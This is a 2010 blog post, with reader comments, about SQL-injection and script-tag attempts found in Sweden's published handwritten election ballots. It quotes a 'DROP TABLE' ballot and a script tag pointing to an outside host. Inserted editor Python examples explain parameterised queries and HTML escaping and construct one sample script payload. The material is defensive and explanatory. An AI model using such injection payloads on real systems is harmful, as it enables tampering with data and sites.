Did Little Bobby Tables migrate to Sweden?

Posted by Jonas Elfström Thu, 23 Sep 2010 20:36:00 GMT

As you may have heard, we've had a very close election here in Sweden. Today the Swedish Election Authority published the handwritten votes. While scanning through them I happened to notice:

R;13;Hallands län;80;Halmstad;01;Halmstads västra valkrets;0904;Söndrum 4;pwn DROP TABLE VALJ;1

The second to last field[1] is the actual text on the ballot[2]. Could it be that Little Bobby Tables is all grown up and has migrated to Sweden? Well, it's probably just a joke but even so it brings questions since an SQL-injection on election data would be very serious.

Someone even tried to get some JavaScript in there:

R;14;Västra Götalands län;80;Göteborg;03;Göteborg, Centrum;0722;Centrum, Övre Johanneberg;(Script src=http://hittepa.webs.com/x.txt);1

I'm pleased to see that they published the list as text and not HTML. This hacker/joker voter seems to think[3] they "censored" his vote/script. I'm not so sure about that; a more reasonable explanation is that they couldn't enter brackets, quotation marks, and so on.

There are also a couple of URLs to online retailers and three votes on a conspiracy friendly site. I chose not to link to any of those.

This time the pen and paper scripting attack failed. Let's hope it stays that way.
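The two published records above are worth walking through as data, because the post's two worries (SQL in the ballot field, a script tag rendered as HTML) are both answered by the same two habits: pass the ballot text to the database as a parameter, never as SQL text, and escape it when rendering it as HTML. The example below is added here by the editor and is not the author's code nor anything from the Election Authority; it assumes an in-memory SQLite table (the name valj is borrowed from the ballot text, not known to be the real table), and the third record with real angle brackets is constructed to show what html.escape does with the script attempt had it survived intact.

```python
import html
import sqlite3

# The two records quoted in the post, plus one constructed record (district
# and URL made up, angle brackets intact) to exercise the HTML escaping.
RECORDS = [
    "R;13;Hallands län;80;Halmstad;01;Halmstads västra valkrets;0904;Söndrum 4;pwn DROP TABLE VALJ;1",
    "R;14;Västra Götalands län;80;Göteborg;03;Göteborg, Centrum;0722;Centrum, Övre Johanneberg;(Script src=http://hittepa.webs.com/x.txt);1",
    "R;99;Testlän;00;Teststad;00;Testkrets;0000;Testdistrikt;<script src=http://example.invalid/x.txt>;1",
]


def parse_record(line):
    """Split one semicolon-delimited record into (ballot_text, count).

    Field positions follow the post: the ballot text is the second-to-last
    field and the vote count is the last one.
    """
    fields = line.split(";")
    if len(fields) < 3:
        raise ValueError("too few fields in record: %r" % line)
    text = fields[-2]
    count = int(fields[-1])  # anything non-numeric is rejected here, before any SQL is built
    return text, count


def load_votes(lines):
    """Store the records in an assumed in-memory table using a parameterised INSERT."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE valj (text TEXT NOT NULL, count INTEGER NOT NULL)")
    # The ballot text travels as a bound value; the SQL statement itself is a constant.
    conn.executemany(
        "INSERT INTO valj (text, count) VALUES (?, ?)",
        (parse_record(line) for line in lines),
    )
    conn.commit()
    return conn


def table_exists(conn, name):
    """Check that a table survived the import (the post's 'DROP TABLE' worry)."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def stored_texts(conn):
    """Return the ballot texts exactly as stored, in insertion order."""
    return [row[0] for row in conn.execute("SELECT text FROM valj ORDER BY rowid")]


def render_html(conn):
    """Render the table as HTML; html.escape neutralises <, >, &, and quotes."""
    rows = [
        "<tr><td>%s</td><td>%d</td></tr>" % (html.escape(text), count)
        for text, count in conn.execute("SELECT text, count FROM valj ORDER BY rowid")
    ]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


if __name__ == "__main__":
    db = load_votes(RECORDS)
    print("table still there:", table_exists(db, "valj"))
    for text in stored_texts(db):
        print("stored:", text)
    print(render_html(db))
```

Note that the first ballot text contains neither a quote nor a semicolon, so even a naively concatenated INSERT would have stored it as a harmless string; the parameterised form is what makes that a guarantee rather than luck, and the escaped render is what lets a text-only publication be safely turned into a web page.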


PS. Someone noticed that there are no votes from Stockholm in there right now (2010-09-24). I asked the Swedish Election Authority about this and it turns out that The County Administrative Board (Länsstyrelsen) gets two months to register all the handwritten votes. There's a good chance that those will bring more attempts like the ones above. DS.

EDIT 2010-09-24
Links:
Aftonbladet DN SvD Expressen SVT - all in Swedish.
Slashdot BBC Wired

[1] The name of the party, not a name of a person.
[2] Almost all Swedish voters use the preprinted ballots but you are allowed to write your own by hand.
[3] The site disappeared after this post was published.

Posted in Security | 31 comments

Comments

    1. Ruben Berenguel Thu, 23 Sep 2010 21:23:21 GMT

      Okay, now Sweden is my second favourite country after Iceland :)

      Cheers,

      Ruben

    2. Uwe Fri, 24 Sep 2010 04:46:18 GMT

      That’s really a great idea, will try this in Germany, too. Luckily, this XKCD strip is one of the few ones that I actually (think I) do understand.

    3. Name Fri, 24 Sep 2010 05:27:31 GMT

      @Uwe: I suppose you haven’t been to an election in Germany yet. There are no write-in votes here. If a ballot contains any kind of commentary it will be considered invalid and merely counted as such. I wouldn’t bet on being able to achieve any integer overflows either considering that the ballots are counted manually. ;-)

    4. Jonas Fri, 24 Sep 2010 06:27:27 GMT

      I would recommend that you place your vote on a real party instead.

    5. yaw Fri, 24 Sep 2010 06:48:21 GMT

      @Name

      There is one exception:

      If there is an election of the mayor, you are allowed to write the name of the person you want to become mayor on the ballot, if you don’t agree with the prewritten choices on it.

    6. Carsten Fri, 24 Sep 2010 07:51:15 GMT

      That is awesome.

      Kind of reminds me of this story: https://www.sysedata.no/nyheter/edvin-tables#english.

      Making assumptions of lack of security often creates funny situations :)

    7. killswitch Fri, 24 Sep 2010 08:49:36 GMT

      @ name: in some of Germany’s federal states you can propose your own candidate if it’s a mayoral election in a small commune

      @ topic: gogo gadget javascript

    8. Rias Fri, 24 Sep 2010 09:04:15 GMT

      @yaw

      you could also start a party and try to get on the ballot. You need about 2000 signatures in one Bundesland … As far as I know there are no juristic restrictions on the party name ;)

    9. Stefan Fri, 24 Sep 2010 09:47:09 GMT

      @Name: Elections for mayors, at least in Germany’s federal state of Baden-Wuerttemberg allow voters to put a handwritten name on the ballot. So this idea is applicable in Germany as well.

    10. Martin Fri, 24 Sep 2010 11:16:06 GMT

      Haha, that’s about the only good thing this election has brought us.

      However, unless you possess the ability to time travel (kudos if you do), I’d say that now should probably be 2010-09-24 and not 2010-10-24.

    11. Ivar Fri, 24 Sep 2010 11:44:38 GMT

      So I should have voted for “Myself;1000000” to get a million votes?

    12. Super Fri, 24 Sep 2010 11:44:51 GMT

      I would recommend that you place your vote on a real party instead.

      Why cast 1 vote when you could cast 10 :)

    13. Jonas Elfström Fri, 24 Sep 2010 12:18:55 GMT

      @Martin Thanks! Corrected.

    14. Finnjävel Igen Fri, 24 Sep 2010 13:19:42 GMT

      Haha, candidate called Kalle Anka got 178 handwritten votes, which is quite a lot in a situation where 800 votes made a difference between majority and minority:-)

    15. humus Fri, 24 Sep 2010 14:04:45 GMT

      @finnjävel igen “Kalle Anka” is the name of Donald Duck in Sweden ;D but your name sounds Scandinavian..u probably know that already ^^

    16. Name Fri, 24 Sep 2010 14:43:30 GMT

      @yaw and others: Thank you for correcting me, I did not know that. So, @Uwe, good luck with your project :)

    17. Jonas Elfström Fri, 24 Sep 2010 15:00:47 GMT
    18. Finnjävel, not the previous one Fri, 24 Sep 2010 15:56:41 GMT
    19. Jonas Elfström Fri, 24 Sep 2010 16:36:15 GMT
    20. pipe Fri, 24 Sep 2010 16:43:53 GMT

      Argh. Someone should recall their “utgivningsbevis”. This is so stupid.

    21. Been there, done that Fri, 24 Sep 2010 22:43:41 GMT
    22. Thomas Mon, 27 Sep 2010 10:43:21 GMT

      If those findings show anything, then that: your Swedish voting software seems to be secure in terms of Web Application Security. Be proud!

    23. Lurker111 Fri, 15 Oct 2010 00:09:42 GMT

      I occasionally code SQL to interface with customer databases. It had never occurred to me that the syntax of the overall SQL statement could be short-circuited in this way. Now that I think of it, it is rather obvious. One thing I do before accepting a character field is run it against a routine to double quote marks; this may prevent the attack. Does anyone know?

      (Naturally, quote marks & special characters in a numeric field trigger an edit error right away.)

    24. Jonas Elfström Fri, 15 Oct 2010 10:45:55 GMT

      @Lurker111 There is a lot of good advice on how to prevent SQL injection on Wikipedia.
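Comment 23 asks whether doubling the quote marks in a character field prevents the attack, and comment 24 points to the standard advice. The example below, added by the editor and not code from either commenter, puts the two approaches side by side: a quote-doubling routine that is correct only as long as every escaped value is wrapped in single quotes and every numeric field is type-checked before it reaches the statement, and a parameterised INSERT where the database driver keeps data and SQL apart so no escaping is needed at all. It assumes an in-memory SQLite table (valj, an assumed name) and constructed party names containing apostrophes.

```python
import sqlite3


def escape_single_quotes(value):
    """The 'double the quote marks' routine from comment 23.

    An SQL string literal ends at the first unpaired single quote, so each
    embedded quote is doubled to keep it inside the literal.
    """
    return value.replace("'", "''")


def insert_by_concatenation(conn, party, count):
    """String-building INSERT, made safe by two rules that are easy to forget:
    every character value is escaped AND wrapped in quotes, and every numeric
    value is converted to int first (a non-number raises ValueError, which is
    the 'edit error' comment 23 describes for numeric fields)."""
    count = int(count)
    sql = "INSERT INTO valj (text, count) VALUES ('%s', %d)" % (
        escape_single_quotes(party),
        count,
    )
    conn.execute(sql)


def insert_by_parameters(conn, party, count):
    """Parameterised INSERT: the statement is constant, the values are bound
    separately, so quotes in the data are just data."""
    conn.execute("INSERT INTO valj (text, count) VALUES (?, ?)", (party, int(count)))


def fresh_table():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE valj (text TEXT NOT NULL, count INTEGER NOT NULL)")
    return conn


# Constructed sample rows: party names with one and with doubled apostrophes.
SAMPLES = [("Bobby's Party", "1"), ("Friends of ''Quotes''", "2")]


def round_trip(insert):
    """Insert the samples with the given routine and read them back verbatim."""
    conn = fresh_table()
    for party, count in SAMPLES:
        insert(conn, party, count)
    return [tuple(row) for row in conn.execute("SELECT text, count FROM valj ORDER BY rowid")]


def rejects_non_numeric_count(insert):
    """Both routines must refuse a count that is not a number."""
    conn = fresh_table()
    try:
        insert(conn, "Any Party", "not-a-number")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for routine in (insert_by_concatenation, insert_by_parameters):
        print(routine.__name__, round_trip(routine), rejects_non_numeric_count(routine))
```

Both routines round-trip the apostrophes correctly, which is the answer to the question as asked; the practical difference is that the concatenation version depends on the escaping and the int() check being applied at every call site, while the parameterised version has nothing to forget.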

    25. Security Tester Fri, 15 Oct 2010 14:25:32 GMT

      Lurker….character encoding might just work

    26. Headboards for beds Wed, 03 Nov 2010 03:35:29 GMT

      The Swedish Election Authority actually got back to you? Kudos!

    27. Jonas Elfström Wed, 03 Nov 2010 09:22:09 GMT

      Yes they did. They actually answered in a couple of hours.

    28. Jan Tagesgeld Fri, 26 Nov 2010 11:09:53 GMT

      Are there any legal implications with votes trying to mess up the voting system? I guess the authorities are not too happy with these attempts, but as nothing happened and the votes are anonymous, there is nothing they can do :) And at first, I thought that “hittepa” was an attempt to write “http”, hehe.

    29. Dom Tue, 19 Apr 2011 12:35:12 GMT

      Haha wicked!

    30. Ian Best Sat, 24 Mar 2012 03:08:11 GMT

      Haha, nice idea, will start a party and try to get on the ballot. A win with predefined margin is guaranteed :)

    31. Dan Fri, 30 Mar 2012 02:35:07 GMT

      I wonder if little Bobby Tables is planning to migrate to the US as the 2012 presidential election is just a few months away. HA!

Comments are closed